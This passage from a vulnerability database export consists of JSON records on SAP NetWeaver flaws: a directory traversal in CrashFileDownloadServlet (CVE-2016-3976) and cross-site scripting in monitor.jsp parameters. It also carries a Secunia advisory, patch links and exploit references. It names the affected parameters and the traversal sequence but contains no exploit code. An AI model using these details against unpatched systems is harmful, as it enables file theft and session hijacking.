"data": "Directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to read arbitrary files via a ..\\ (dot dot backslash) in the fileName parameter to CrashFileDownloadServlet, aka SAP Security Note 2234971. SAP NetWeaver AS Java Contains a directory traversal vulnerability. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. \nRemote attackers can use specially crafted requests with directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files in the context of the application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "BID",
"id": "85946"
},
{
"db": "VULMON",
"id": "CVE-2016-3976"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39996",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3976",
"trust": 2.8
},
{
"db": "EXPLOIT-DB",
"id": "39996",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "137528",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099",
"trust": 0.6
},
{
"db": "BID",
"id": "85946",
"trust": 0.4
},
{
"db": "VULMON",
"id": "CVE-2016-3976",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"db": "BID",
"id": "85946"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"id": "VAR-201604-0660",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-26T00:20:35.282000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2234971",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver AS Java Fixes for directory traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60830"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2021/04/06/sap_patch_attacks/"
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/39996/"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2016/jun/40"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/137528/sap-netweaver-as-java-7.5-directory-traversal.html"
},
{
"trust": 1.7,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-march-2016-review/"
},
{
"trust": 1.7,
"url": "https://erpscan.io/advisories/erpscan-16-012/"
},
{
"trust": 1.7,
"url": "https://launchpad.support.sap.com/#/notes/2234971"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3976"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3976"
},
{
"trust": 0.8,
"url": "https://erpscan.com/advisories/erpscan-16-012/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/85946"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"db": "BID",
"id": "85946"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-04-07T00:00:00",
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"date": "2016-04-07T00:00:00",
"db": "BID",
"id": "85946"
},
{
"date": "2016-04-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"date": "2016-04-07T23:59:10.797000",
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"date": "2016-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-04-29T00:00:00",
"db": "VULMON",
"id": "CVE-2016-3976"
},
{
"date": "2016-07-05T22:40:00",
"db": "BID",
"id": "85946"
},
{
"date": "2016-08-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002003"
},
{
"date": "2022-04-29T15:36:03.657000",
"db": "NVD",
"id": "CVE-2016-3976"
},
{
"date": "2021-11-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver AS Java Vulnerable to directory traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-002003"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201604-099"
}
],
"trust": 0.6
}
}
var-201708-1677
Vulnerability from variot
SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1677",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100176"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100176"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.\nRemote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.",
"sources": [
{
"db": "BID",
"id": "100176"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100176",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100176"
}
]
},
"id": "VAR-201708-1677",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:59:57.226000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2417020"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100176"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100176"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100176"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100176"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100176"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Business Unspecified Cross Site Scripting Vulnerability",
"sources": [
{
"db": "BID",
"id": "100176"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100176"
}
],
"trust": 0.3
}
}
var-201104-0315
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has an input validation error, and the input to the \"sort\", \"numPerPage\", \"page\", \"lastPage\", \"numPerpageb\", \"pageb\" and \"direction\" parameters passed to MessagingSystem/monitor/monitor.jsp is returned. The lack of filtering by users can lead to cross-site scripting attacks. The user lacks filtering before and can execute arbitrary HTML and script code on the target user's browser. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------
A step-by-step discussion of the latest Flash Player 0-day exploit: http://secunia.com/blog/210
TITLE: SAP NetWeaver Multiple Cross-Site Scripting Vulnerabilities
SECUNIA ADVISORY ID: SA44187
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44187/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44187
RELEASE DATE: 2011-04-14
DISCUSS ADVISORY: http://secunia.com/advisories/44187/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/44187/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44187
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in SAP NetWeaver, which can be exploited by malicious people to conduct cross-site scripting attacks.
SOLUTION: Apply fixes (please see the vendor's advisory for details).
PROVIDED AND/OR DISCOVERED BY: 1) Alexandr Polyakov, Digital Security Research Group 2) Dmitriy Evdokimov, Digital Security Research Group
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1443367 https://service.sap.com/sap/support/notes/1490335
Digital Security Research Group (DSECRG-11-015, DSECRG-11-016): http://dsecrg.com/pages/vul/show.php?id=315 http://dsecrg.com/pages/vul/show.php?id=316
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201104-0315",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "6.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.4,
"vendor": "sap",
"version": "7.30*"
}
],
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"db": "BID",
"id": "47360"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexandr Polyakov and Dmitriy Evdokimov from Digital Security Research Group",
"sources": [
{
"db": "BID",
"id": "47360"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver has an input validation error, and the input to the \\\"sort\\\", \\\"numPerPage\\\", \\\"page\\\", \\\"lastPage\\\", \\\"numPerpageb\\\", \\\"pageb\\\" and \\\"direction\\\" parameters passed to MessagingSystem/monitor/monitor.jsp is returned. The lack of filtering by users can lead to cross-site scripting attacks. The user lacks filtering before and can execute arbitrary HTML and script code on the target user\u0027s browser. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. This may let the attacker steal cookie-based authentication credentials and launch other attacks. ----------------------------------------------------------------------\n\n\nA step-by-step discussion of the latest Flash Player 0-day exploit:\nhttp://secunia.com/blog/210\n\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Multiple Cross-Site Scripting Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA44187\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/44187/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44187\n\nRELEASE DATE:\n2011-04-14\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/44187/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/44187/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=44187\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in SAP NetWeaver, which\ncan be exploited by malicious people to conduct cross-site scripting\nattacks. \n\nSOLUTION:\nApply fixes (please see the vendor\u0027s advisory for details). \n\nPROVIDED AND/OR DISCOVERED BY:\n1) Alexandr Polyakov, Digital Security Research Group\n2) Dmitriy Evdokimov, Digital Security Research Group\n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1443367\nhttps://service.sap.com/sap/support/notes/1490335\n\nDigital Security Research Group (DSECRG-11-015, DSECRG-11-016):\nhttp://dsecrg.com/pages/vul/show.php?id=315\nhttp://dsecrg.com/pages/vul/show.php?id=316\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/products/corporate/EVM/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"db": "BID",
"id": "47360"
},
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "100438"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "47360",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2011-1468",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2011-1467",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "44187",
"trust": 0.7
},
{
"db": "IVD",
"id": "5FC42B3E-1F98-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "IVD",
"id": "618C24F8-1F98-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "100438",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
},
{
"db": "BID",
"id": "47360"
},
{
"db": "PACKETSTORM",
"id": "100438"
}
]
},
"id": "VAR-201104-0315",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
}
],
"trust": 1.8691792200000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 1.6
}
],
"sources": [
{
"db": "IVD",
"id": "5fc42b3e-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "IVD",
"id": "618c24f8-1f98-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-1467"
},
{
"db": "CNVD",
"id": "CNVD-2011-1468"
}
]
},
"last_update_date": "2022-05-17T02:07:20.408000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP NetWeaver Cross-Site Scripting Vulnerability",
"trust": 0.6,
